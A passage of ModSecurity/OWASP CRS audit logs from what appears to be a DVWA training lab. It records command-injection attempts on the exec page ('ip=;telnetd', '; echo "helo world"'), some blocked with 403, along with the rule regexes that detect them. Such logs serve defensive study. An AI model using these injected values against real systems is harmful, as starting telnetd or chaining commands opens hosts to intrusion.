\"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":911,"p2":3883,"p3":0,"p4":0,"p5":186,"sr":40,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:23 --0400","transaction_id":"WRczc38AAQEAAAkW4RoAAAAB","remote_address":"192.168.75.145","remote_port":56764,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"27"},"body":["ip=%3Btelnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczc38AAQEAAAkW4RoAAAAB\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":594,"p2":2361,"p3":153,"p4":1613,"p5":75,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:38 --0400","transaction_id":"WRczgn8AAQEAAAkXs@YAAAAC","remote_address":"192.168.75.145","remote_port":56766,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"56"},"body":["ip=192.168.75.134%3B+echo+%22helo+world%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; echo \\x22helo world found within ARGS:ip: 192.168.75.134; echo \\x22helo world\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ; echo found within ARGS:ip: 192.168.75.134; echo \\x22helo world\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; echo \\\\\\\\x22helo world found within ARGS:ip: 192.168.75.134; echo \\\\\\\\x22helo world\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ; echo found within ARGS:ip: 192.168.75.134; echo \\\\\\\\x22helo world\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":488,"p2":15193,"p3":0,"p4":0,"p5":192,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:03 --0400","transaction_id":"WRczm38AAQEAAAkYuEsAAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 14:34:24 GMT","If-None-Match":"\"15a-54f68b7e775af\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:26:00 GMT","ETag":"\"1a8-54f6a470f3057\"","Accept-Ranges":"bytes","Content-Length":"424","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRczm38AAQEAAAkYuEsAAAAD\"]"],"stopwatch":{"p1":667,"p2":1658,"p3":113,"p4":393,"p5":94,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:04 --0400","transaction_id":"WRcznH8AAQEAAAkYuEwAAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcznH8AAQEAAAkYuEwAAAAD\"]"],"stopwatch":{"p1":805,"p2":1564,"p3":87,"p4":464,"p5":65,"sr":48,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:04 --0400","transaction_id":"WRcznH8AAQEAAAkYuE0AAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 